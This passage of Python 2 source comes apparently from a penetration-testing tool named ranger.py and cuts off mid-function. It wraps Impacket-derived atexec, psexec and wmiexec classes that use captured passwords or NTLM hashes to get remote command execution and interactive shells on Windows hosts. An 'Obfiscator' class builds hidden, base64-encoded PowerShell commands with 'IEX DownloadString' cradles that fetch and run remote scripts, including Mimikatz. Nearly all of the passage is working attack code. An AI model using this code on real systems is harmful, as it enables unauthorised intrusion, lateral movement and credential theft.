self.atexec_run(protocol, addr, port, protodef)
else:
for protocol in self.__protocols:
protodef = ATSVC_EXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
logging.info("Trying protocol %s..." % protocol)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
try:
self.doStuff(rpctransport)
except Exception, e:
logging.error(e)
else:
# Got a response. No need for further iterations.
break
def atexec_run(self, protocol, addr, port, protodef):
logging.info("Trying protocol %s..." % protocol)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
try:
self.doStuff(rpctransport)
except Exception, e:
logging.error(e)
else:
# Got a response. No need for further iterations.
sys.exit("[-] Nothing left to process")
def doStuff(self, rpctransport):
def output_callback(data):
print data
dce = rpctransport.get_dce_rpc()
dce.set_credentials(*rpctransport.get_credentials())
dce.connect()
#dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
#dce.set_max_fragment_size(16)
dce.bind(atsvc.MSRPC_UUID_ATSVC)
at = atsvc.DCERPCAtSvc(dce)
tmpFileName = ''.join([random.choice(string.letters) for i in range(8)]) + '.tmp'
# Check [MS-TSCH] Section 2.3.4
atInfo = atsvc.AT_INFO()
atInfo['JobTime'] = 0
atInfo['DaysOfMonth'] = 0
atInfo['DaysOfWeek'] = 0
atInfo['Flags'] = 0
atInfo['Command'] = ndrutils.NDRUniqueStringW()
atInfo['Command']['Data'] = ('%%COMSPEC%% /C %s > %%SYSTEMROOT%%\\Temp\\%s\x00' % (self.__command, tmpFileName)).encode('utf-16le')
resp = at.NetrJobAdd(('\\\\%s'% rpctransport.get_dip()),atInfo)
jobId = resp['JobID']
#resp = at.NetrJobEnum(rpctransport.get_dip())
# Switching context to TSS
dce2 = dce.alter_ctx(atsvc.MSRPC_UUID_TSS)
# Now atsvc should use that new context
at = atsvc.DCERPCAtSvc(dce2)
resp = at.SchRpcRun('\\At%d' % jobId)
# On the first run it takes a while for the remote target to start executing the job,
# so I'm adding this sleep. I don't like sleeps, but this is just an example.
# The best approach would be to check the task status before attempting to read the file.
time.sleep(3)
# Switching back to the old ctx_id
at = atsvc.DCERPCAtSvc(dce)
resp = at.NetrJobDel('\\\\%s'% rpctransport.get_dip(), jobId, jobId)
smbConnection = rpctransport.get_smb_connection()
while True:
try:
smbConnection.getFile('ADMIN$', 'Temp\\%s' % tmpFileName, output_callback)
break
except Exception, e:
if str(e).find('SHARING') > 0:
time.sleep(3)
else:
raise
smbConnection.deleteFile('ADMIN$', 'Temp\\%s' % tmpFileName)
dce.disconnect()
'''
IMPACKET PSEXEC
'''
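# Adapted from Impacket's psexec.py: a RemCom service binary is installed on the target,
# the command is sent through the RemCom_communicaton control pipe (the misspelling is the
# pipe's actual name), and three helper threads relay the RemCom stdin/stdout/stderr named
# pipes to the local console.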
class RemComMessage(Structure):
structure = (
('Command','4096s=""'),
('WorkingDir','260s=""'),
('Priority','<L=0x20'),
('ProcessID','<L=0x01'),
('Machine','260s=""'),
('NoWait','<L=0'),
)
class RemComResponse(Structure):
structure = (
('ErrorCode','<L=0'),
('ReturnCode','<L=0'),
)
RemComSTDOUT = "RemCom_stdout"
RemComSTDIN = "RemCom_stdin"
RemComSTDERR = "RemCom_stderr"
lock = Lock()
class PSEXEC:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
}
def __init__(self, command, path, exeFile, copyFile, protocols = None,
username = '', password = '', domain = '', hashes = None, aesKey = None, doKerberos = False):
self.__username = username
self.__password = password
if protocols is None:
self.__protocols = PSEXEC.KNOWN_PROTOCOLS.keys()
else:
self.__protocols = [protocols]
self.__command = command
self.__path = path
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__exeFile = exeFile
self.__copyFile = copyFile
self.__doKerberos = doKerberos
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def run(self, addr):
for protocol in self.__protocols:
protodef = PSEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
logging.info("Trying protocol %s...\n" % protocol)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
#if hasattr(rpctransport,'preferred_dialect'):
# rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos)
self.doStuff(rpctransport)
def openPipe(self, s, tid, pipe, accessMask):
pipeReady = False
tries = 50
while pipeReady is False and tries > 0:
try:
s.waitNamedPipe(tid,pipe)
pipeReady = True
except:
tries -= 1
time.sleep(2)
pass
if tries == 0:
logging.critical('Pipe not ready, aborting')
raise
fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)
return fid
def doStuff(self, rpctransport):
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except Exception, e:
logging.critical(str(e))
sys.exit(1)
global dialect
dialect = rpctransport.get_smb_connection().getDialect()
try:
unInstalled = False
s = rpctransport.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(100000)
if self.__exeFile is None:
installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())
else:
try:
f = open(self.__exeFile)
except Exception, e:
logging.critical(str(e))
sys.exit(1)
installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), f)
installService.install()
if self.__exeFile is not None:
f.close()
# Check if we need to copy a file for execution
if self.__copyFile is not None:
installService.copy_file(self.__copyFile, installService.getShare(), os.path.basename(self.__copyFile))
# And we change the command to be executed to this filename
self.__command = os.path.basename(self.__copyFile) + ' ' + self.__command
tid = s.connectTree('IPC$')
fid_main = self.openPipe(s,tid,'\RemCom_communicaton',0x12019f)
packet = RemComMessage()
pid = os.getpid()
packet['Machine'] = ''.join([random.choice(string.letters) for i in range(4)])
if self.__path is not None:
packet['WorkingDir'] = self.__path
packet['Command'] = self.__command
packet['ProcessID'] = pid
s.writeNamedPipe(tid, fid_main, str(packet))
# Here we'll store the command we type so we don't print it back ;)
# ( I know.. globals are nasty :P )
global LastDataSent
LastDataSent = ''
# Create the pipes threads
stdin_pipe = RemoteStdInPipe(rpctransport,'\%s%s%d' % (RemComSTDIN ,packet['Machine'],packet['ProcessID']), smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare() )
stdin_pipe.start()
stdout_pipe = RemoteStdOutPipe(rpctransport,'\%s%s%d' % (RemComSTDOUT,packet['Machine'],packet['ProcessID']), smb.FILE_READ_DATA )
stdout_pipe.start()
stderr_pipe = RemoteStdErrPipe(rpctransport,'\%s%s%d' % (RemComSTDERR,packet['Machine'],packet['ProcessID']), smb.FILE_READ_DATA )
stderr_pipe.start()
# And we stay here till the end
ans = s.readNamedPipe(tid,fid_main,8)
if len(ans):
retCode = RemComResponse(ans)
logging.info("Process %s finished with ErrorCode: %d, ReturnCode: %d" % (self.__command, retCode['ErrorCode'], retCode['ReturnCode']))
installService.uninstall()
if self.__copyFile is not None:
# We copied a file for execution, let's remove it
s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))
unInstalled = True
sys.exit(retCode['ErrorCode'])
except SystemExit:
raise
except:
if unInstalled is False:
installService.uninstall()
if self.__copyFile is not None:
s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))
sys.stdout.flush()
sys.exit(1)
class Pipes(Thread):
def __init__(self, transport, pipe, permissions, share=None):
Thread.__init__(self)
self.server = 0
self.transport = transport
self.credentials = transport.get_credentials()
self.tid = 0
self.fid = 0
self.share = share
self.port = transport.get_dport()
self.pipe = pipe
self.permissions = permissions
self.daemon = True
def connectPipe(self):
try:
lock.acquire()
global dialect
#self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = dialect)
user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
if self.transport.get_kerberos() is True:
self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)
else:
self.server.login(user, passwd, domain, lm, nt)
lock.release()
self.tid = self.server.connectTree('IPC$')
self.server.waitNamedPipe(self.tid, self.pipe)
self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)
self.server.setTimeout(1000000)
except:
logging.error("Something wen't wrong connecting the pipes(%s), try again" % self.__class__)
class RemoteStdOutPipe(Pipes):
def __init__(self, transport, pipe, permissions):
Pipes.__init__(self, transport, pipe, permissions)
def run(self):
self.connectPipe()
while True:
try:
ans = self.server.readFile(self.tid,self.fid, 0, 1024)
except Exception, e:
pass
else:
try:
global LastDataSent
if ans != LastDataSent:
sys.stdout.write(ans)
sys.stdout.flush()
else:
# Don't echo what I sent, and clear it up
LastDataSent = ''
# Just in case this got out of sync, clean it up if more than 10 chars are pending;
# it may give false positives, though. We should find a better way to handle this.
if len(LastDataSent) > 10:
LastDataSent = ''
except:
pass
class RemoteStdErrPipe(Pipes):
def __init__(self, transport, pipe, permissions):
Pipes.__init__(self, transport, pipe, permissions)
def run(self):
self.connectPipe()
while True:
try:
ans = self.server.readFile(self.tid,self.fid, 0, 1024)
except Exception, e:
pass
else:
try:
sys.stderr.write(str(ans))
sys.stderr.flush()
except:
pass
class PsexecRemoteShell(cmd.Cmd):
def __init__(self, server, port, credentials, tid, fid, share, transport):
cmd.Cmd.__init__(self, False)
self.prompt = '\x08'
self.server = server
self.transferClient = None
self.tid = tid
self.fid = fid
self.credentials = credentials
self.share = share
self.port = port
self.transport = transport
self.intro = '[!] Press help for extra shell commands'
def connect_transferClient(self):
#self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = dialect)
user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
if self.transport.get_kerberos() is True:
self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)
else:
self.transferClient.login(user, passwd, domain, lm, nt)
def do_help(self, line):
print """
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
put {src_file, dst_path} - uploads a local file to the dst_path RELATIVE to the connected share (%s)
get {file} - downloads pathname RELATIVE to the connected share (%s) to the current local dir
! {cmd} - executes a local shell cmd
""" % (self.share, self.share)
self.send_data('\r\n', False)
def do_shell(self, s):
os.system(s)
self.send_data('\r\n')
def do_get(self, src_path):
try:
if self.transferClient is None:
self.connect_transferClient()
import ntpath
filename = ntpath.basename(src_path)
fh = open(filename,'wb')
logging.info("Downloading %s\%s" % (self.share, src_path))
self.transferClient.getFile(self.share, src_path, fh.write)
fh.close()
except Exception, e:
logging.critical(str(e))
pass
self.send_data('\r\n')
def do_put(self, s):
try:
if self.transferClient is None:
self.connect_transferClient()
params = s.split(' ')
if len(params) > 1:
src_path = params[0]
dst_path = params[1]
elif len(params) == 1:
src_path = params[0]
dst_path = '/'
src_file = os.path.basename(src_path)
fh = open(src_path, 'rb')
f = dst_path + '/' + src_file
pathname = string.replace(f,'/','\\')
logging.info("Uploading %s to %s\%s" % (src_file, self.share, dst_path))
self.transferClient.putFile(self.share, pathname, fh.read)
fh.close()
except Exception, e:
logging.error(str(e))
pass
self.send_data('\r\n')
def do_lcd(self, s):
if s == '':
print os.getcwd()
else:
os.chdir(s)
self.send_data('\r\n')
def emptyline(self):
self.send_data('\r\n')
return
def default(self, line):
self.send_data(line+'\r\n')
def send_data(self, data, hideOutput = True):
if hideOutput is True:
global LastDataSent
LastDataSent = data
else:
LastDataSent = ''
self.server.writeFile(self.tid, self.fid, data)
class RemoteStdInPipe(Pipes):
def __init__(self, transport, pipe, permissions, share=None):
Pipes.__init__(self, transport, pipe, permissions, share)
def run(self):
self.connectPipe()
self.shell = PsexecRemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share, self.transport)
self.shell.cmdloop()
'''
IMPACKET WMIEXEC
'''
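# Adapted from Impacket's wmiexec.py: commands are spawned through Win32_Process.Create
# over DCOM/WMI, with output redirected to a file on the chosen share and read back over
# SMB unless noOutput is set, in which case execution is blind.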
WMIEXEC_OUTPUT_FILENAME = '__'
class WMIEXEC:
def __init__(self, command = '', username = '', password = '', domain = '', hashes = None, aesKey = None, share = None, noOutput=False, doKerberos=False):
self.__command = command
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__share = share
self.__noOutput = noOutput
self.__doKerberos = doKerberos
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def run(self, addr):
if self.__noOutput is False:
smbConnection = SMBConnection(addr, addr)
if self.__doKerberos is False:
smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
dialect = smbConnection.getDialect()
if dialect == SMB_DIALECT:
logging.info("SMBv1 dialect used")
elif dialect == SMB2_DIALECT_002:
logging.info("SMBv2.0 dialect used")
elif dialect == SMB2_DIALECT_21:
logging.info("SMBv2.1 dialect used")
else:
logging.info("SMBv3.0 dialect used")
else:
smbConnection = None
dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, oxidResolver = True, doKerberos=self.__doKerberos)
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
win32Process,_ = iWbemServices.GetObject('Win32_Process')
try:
self.shell = WmiexecRemoteShell(self.__share, win32Process, smbConnection)
if self.__command != ' ':
self.shell.onecmd(self.__command)
else:
self.shell.cmdloop()
except (Exception, KeyboardInterrupt), e:
#import traceback
#traceback.print_exc()
logging.error(str(e))
if smbConnection is not None:
smbConnection.logoff()
dcom.disconnect()
sys.stdout.flush()
sys.exit(1)
if smbConnection is not None:
smbConnection.logoff()
dcom.disconnect()
class WmiexecRemoteShell(cmd.Cmd):
def __init__(self, share, win32Process, smbConnection):
cmd.Cmd.__init__(self)
self.__share = share
self.__output = '\\' + WMIEXEC_OUTPUT_FILENAME
self.__outputBuffer = ''
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
self.__transferClient = smbConnection
self.__pwd = 'C:\\'
self.__noOutput = False
self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'
# We don't wanna deal with timeouts from now on.
if self.__transferClient is not None:
self.__transferClient.setTimeout(100000)
self.do_cd('\\')
else:
self.__noOutput = True
def do_shell(self, s):
os.system(s)
def do_help(self, line):
print """
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
put {src_file, dst_path} - uploads a local file to the dst_path (dst_path = default current directory)
get {file} - downloads pathname to the current local dir
! {cmd} - executes a local shell cmd
"""
def do_lcd(self, s):
if s == '':
print os.getcwd()
else:
os.chdir(s)
def do_get(self, src_path):
try:
import ntpath
newPath = ntpath.normpath(ntpath.join(self.__pwd, src_path))
drive, tail = ntpath.splitdrive(newPath)
filename = ntpath.basename(tail)
fh = open(filename,'wb')
logging.info("Downloading %s\\%s" % (drive, tail))
self.__transferClient.getFile(drive[:-1]+'$', tail, fh.write)
fh.close()
except Exception, e:
logging.error(str(e))
os.remove(filename)
pass
def do_put(self, s):
try:
params = s.split(' ')
if len(params) > 1:
src_path = params[0]
dst_path = params[1]
elif len(params) == 1:
src_path = params[0]
dst_path = ''
src_file = os.path.basename(src_path)
fh = open(src_path, 'rb')
dst_path = string.replace(dst_path, '/','\\')
import ntpath
pathname = ntpath.join(ntpath.join(self.__pwd,dst_path), src_file)
drive, tail = ntpath.splitdrive(pathname)
logging.info("Uploading %s to %s" % (src_file, pathname))
self.__transferClient.putFile(drive[:-1]+'$', tail, fh.read)
fh.close()
except Exception, e:
logging.critical(str(e))
pass
def do_exit(self, s):
return True
def emptyline(self):
return False
def do_cd(self, s):
self.execute_remote('cd ' + s)
if len(self.__outputBuffer.strip('\r\n')) > 0:
print self.__outputBuffer
self.__outputBuffer = ''
else:
import ntpath
self.__pwd = ntpath.normpath(ntpath.join(self.__pwd, s))
self.execute_remote('cd ')
self.__pwd = self.__outputBuffer.strip('\r\n')
self.prompt = self.__pwd + '>'
self.__outputBuffer = ''
def default(self, line):
# Let's try to guess if the user is trying to change drive
if len(line) == 2 and line[1] == ':':
# Execute the command and see if the drive is valid
self.execute_remote(line)
if len(self.__outputBuffer.strip('\r\n')) > 0:
# Something went wrong
print self.__outputBuffer
self.__outputBuffer = ''
else:
# Drive valid, now we should get the current path
self.__pwd = line
self.execute_remote('cd ')
self.__pwd = self.__outputBuffer.strip('\r\n')
self.prompt = self.__pwd + '>'
self.__outputBuffer = ''
else:
if line != '':
self.send_data(line)
def get_output(self):
def output_callback(data):
self.__outputBuffer += data
if self.__noOutput is True:
self.__outputBuffer = ''
return
while True:
try:
self.__transferClient.getFile(self.__share, self.__output, output_callback)
break
except Exception, e:
if str(e).find('STATUS_SHARING_VIOLATION') >=0:
# Output not finished, let's wait
time.sleep(1)
pass
else:
#print str(e)
pass
self.__transferClient.deleteFile(self.__share, self.__output)
def execute_remote(self, data):
command = self.__shell + data
if self.__noOutput is False:
command += ' 1> ' + '\\\\127.0.0.1\\%s' % self.__share + self.__output + ' 2>&1'
obj = self.__win32Process.Create(command, self.__pwd, None)
self.get_output()
def send_data(self, data):
self.execute_remote(data)
print self.__outputBuffer
self.__outputBuffer = ''
'''
Author: Christopher Duffy
Date: July 2015
Name: ranger.py
Purpose: To encode commands that execute PowerShell scripts, also provides a wrapper for
some of the impacket examples and fixes relevant functionality
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
'''
NMAP PARSER
'''
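# Parses an Nmap XML report with ElementTree and flattens it into self.hosts, keyed by an
# incrementing index: [hostname, address, protocol, port, service name, MAC address, state].
# Hypothetical usage sketch (the filename is a placeholder, not defined in this module):
#   parser = Nmap_parser("scan.xml", verbose=1)
#   hosts = parser.hosts_return()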
class Nmap_parser:
def __init__(self, nmap_xml, verbose=0):
self.nmap_xml = nmap_xml
self.verbose = verbose
self.hosts = {}
try:
self.run()
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
def run(self):
# Parse the nmap xml file and extract hosts and place them in a dictionary
# Input: Nmap XML file and verbose flag
# Return: Dictionary of hosts [iterated number] = [hostname, address, protocol, port, service name, state]
if not self.nmap_xml:
sys.exit("[!] Cannot open Nmap XML file: %s \n[-] Ensure that your are passing the correct file and format" % (self.nmap_xml))
try:
tree = etree.parse(self.nmap_xml)
except:
sys.exit("[!] Cannot open Nmap XML file: %s \n[-] Ensure that your are passing the correct file and format" % (self.nmap_xml))
hosts={}
services=[]
hostname_list=[]
root = tree.getroot()
hostname_node = None
if self.verbose > 0:
print ("[*] Parsing the Nmap XML file: %s") % (self.nmap_xml)
for host in root.iter('host'):
hostname = "Unknown hostname"
for addresses in host.iter('address'):
hwaddress = "No MAC Address ID'd"
ipv4 = "No IPv4 Address ID'd"
addressv6 = "No IPv6 Address ID'd"
temp = addresses.get('addrtype')
if "mac" in temp:
hwaddress = addresses.get('addr')
if self.verbose > 2:
print("[*] The host was on the same broadcast domain")
if "ipv4" in temp:
address = addresses.get('addr')
if self.verbose > 2:
print("[*] The host had an IPv4 address")
if "ipv6" in temp:
addressv6 = addresses.get('addr')
if self.verbose > 2:
print("[*] The host had an IPv6 address")
try:
hostname_node = host.find('hostnames').find('hostname')
except:
if self.verbose > 1:
print ("[!] No hostname found")
if hostname_node is not None:
hostname = hostname_node.get('name')
else:
hostname = "Unknown hostname"
if self.verbose > 1:
print("[*] The hosts hostname is %s") % (str(hostname_node))
hostname_list.append(hostname)
for item in host.iter('port'):
state = item.find('state').get('state')
#if state.lower() == 'open':
service = item.find('service').get('name')
protocol = item.get('protocol')
port = item.get('portid')
services.append([hostname_list, address, protocol, port, service, hwaddress, state])
hostname_list=[]
for i in range(0, len(services)):
service = services[i]
index = len(service) - 1
hostname = ''.join(service[0])
address = service[1]
protocol = service[2]
port = service[3]
serv_name = service[4]
hwaddress = service[5]
state = service[6]
self.hosts[i] = [hostname, address, protocol, port, serv_name, hwaddress, state]
if self.verbose > 2:
print ("[+] Adding %s with an IP of %s:%s with the service %s")%(hostname,address,port,serv_name)
if self.hosts:
if self.verbose > 4:
print ("[*] Results from NMAP XML import: ")
for key, entry in self.hosts.iteritems():
print("[*] %s") % (str(entry))
if self.verbose > 0:
print ("[+] Parsed and imported unique ports %s") % (str(i+1))
else:
if self.verbose > 0:
print ("[-] No ports were discovered in the NMAP XML file")
def hosts_return(self):
# A controlled return method
# Input: None
# Returned: The processed hosts
try:
return self.hosts
except Exception as e:
print("[!] There was an error returning the data %s") % (e)
'''
TIMEOUT SIGNAL TERMINATION
'''
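# Context manager that raises Timeout.Timeout via SIGALRM if the wrapped block runs longer
# than 'sec' seconds (POSIX only). Hypothetical usage sketch, where long_running_call is a
# placeholder and not a function defined in this module:
#   with Timeout(30):
#       long_running_call()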
class Timeout():
"""Timeout class using ALARM signal."""
class Timeout(Exception):
pass
def __init__(self, sec):
self.sec = sec
def __enter__(self):
signal.signal(signal.SIGALRM, self.raise_timeout)
signal.alarm(self.sec)
def __exit__(self, *args):
signal.alarm(0) # disable alarm
def raise_timeout(self, *args):
raise Timeout.Timeout()
class TargetConverter:
def __init__(self, target):
self.target = target
self.cidr_noted = ""
self.range_value1 = ""
self.range_value2 = ""
self.ip_list = []
self.target_list = []
try:
self.run()
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
def run(self):
range_true = re.search(r'-',self.target)
if "-" in self.target:
range_value1, range_value2 = self.target.split('-')
if len(range_value2) > 3:
self.range_value1 = range_value1
self.range_value2 = range_value2
self.ip_list.extend(self.range_to_list())
else:
self.range_value1 = range_value1
octet1, octet2, octet3, octet4 = self.range_value1.split('.')
self.range_value2 = octet1 + "." + octet2 + "." + octet3 + "." + range_value2
self.ip_list.extend(self.range_to_list())
elif "/" in self.target:
self.cidr_noted = self.target
self.ip_list.extend(self.cidr_to_list())
else:
self.ip_list.append(self.target)
def cidr_to_list(self):
ip_list = []
for ip in netaddr.IPNetwork(self.cidr_noted).iter_hosts():
ip_list.append(ip)
return(ip_list)
def range_to_list(self):
ip_list = []
ip_list = list(netaddr.iter_iprange(self.range_value1, self.range_value2))
return(ip_list)
def return_targets(self):
try:
for ip in self.ip_list:
self.target_list.append(str(ip))
return(self.target_list)
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
class NetviewDetails:
def __init__(self, user = None, users = None, target = None, targets = None, noloop = True, delay = '10', max_connections = '1000', domainController = None, debug = False):
self.user = user
self.users = users
self.target = target
self.targets = targets
self.noloop = noloop
self.delay = delay
self.max_connections = max_connections
self.domainController = domainController
self.debug = debug
def user(self):
return(self.user)
def users(self):
return(self.users)
def target(self):
return(self.target)
def targets(self):
return(self.targets)
def noloop(self):
return(self.noloop)
def delay(self):
return(self.delay)
def max_connections(self):
return(self.max_connections)
def domainController(self):
return(self.domainController)
def debug(self):
return(self.debug)
class Obfiscator:
def __init__(self, src_ip, src_port, payload, function, argument, execution, methods, domain_group, delivery, share_name, domain_name, local_group, dst_ip="", dst_port=""):
self.src_ip = src_ip
self.dst_ip = dst_ip
self.dst_port = dst_port
self.src_port = src_port
self.payload = payload
self.function = function
self.argument = argument
self.execution = execution
self.methods = methods
self.domain_group = domain_group
self.local_group = local_group
self.command = ""
self.unprotected_command = ""
self.delivery = delivery
self.share_name = share_name
self.domain_name = domain_name
try:
self.run()
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
def run(self):
if "invoker" in self.execution:
# Direct invoker
self.invoker()
elif "download" in self.execution:
# Direct downloader
self.downloader()
elif "executor" in self.execution:
# Direct PowerShell execution
self.executor()
elif "domain_group" in self.execution:
# Extract Group Members
self.domain_group_members()
elif "local_group" in self.execution:
# Extract Local Group Members
self.local_group_members()
def packager(self, cleartext):
encoded_utf = cleartext.encode('utf-16-le')
encoded_base64 = base64.b64encode(encoded_utf)
command = "powershell.exe -nop -w hidden -exec bypass -enc %s" % (encoded_base64)
return(command)
def clearer(self, cleartext):
command = 'powershell.exe -nop -w hidden -exec bypass "' + cleartext + '"'
return(command)
def return_command(self):
try:
return(self.command, self.unprotected_command)
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
def invoker(self):
# Invoke Mimikatz Directly
if self.delivery == "web":
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function), str(self.argument))
if self.delivery == "smb":
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function), str(self.argument))
self.command = self.packager(text)
self.unprotected_command = self.clearer(text)
def executor(self):
# Invoke a PowerShell Script Directly
if self.delivery == "web":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function))
elif self.delivery == "smb":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function))
self.command = self.packager(text)
self.unprotected_command = self.clearer(text)
def downloader(self):
# Download String Directly
text = "IEX ((new-object net.webclient).downloadstring('http://%s:%s/'))" % (str(self.src_ip), str(self.src_port))
self.command = self.packager(text)
self.unprotected_command = self.clearer(text)
def domain_group_members(self):
# Group Membership
if self.delivery == "web":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function))
elif self.delivery == "smb":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function))
self.command = self.packager(text)
self.unprotected_command = self.clearer(text)
def local_group_members(self):
# Local Group Membership
if self.delivery == "web":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function))
elif self.delivery == "smb":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function), str(self.argument))
else:
